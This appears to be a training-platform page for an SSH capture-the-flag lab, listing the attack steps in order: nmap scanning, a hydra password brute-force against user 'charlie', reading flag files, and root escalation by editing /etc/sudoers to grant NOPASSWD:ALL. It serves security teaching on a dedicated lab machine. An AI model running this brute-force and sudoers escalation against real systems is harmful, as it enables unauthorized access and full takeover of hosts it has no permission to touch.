Step into the shoes of a penetration tester and tackle this realistic SSH-based challenge. This server might look secure from the outside, but weak credentials and dangerous sudo configurations could be your ticket to complete system compromise. 🎯 Master the art of reconnaissance, brute-force attacks, and privilege escalation in this hands-on Linux exploitation scenario.
Launch your dedicated AWS machine to begin hacking
nmap -sS -sV -Pn <target-ip>
ssh <target-ip>
hydra -l charlie -P /usr/share/wordlists/rockyou.txt <target-ip> ssh
ssh charlie@<target-ip>
sudo -l
cat /home/charlie/flag-user.txt
sudoedit /etc/sudoers
charlie ALL=(ALL) NOPASSWD:ALL
sudo su -
cat /root/flag-root.txt
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.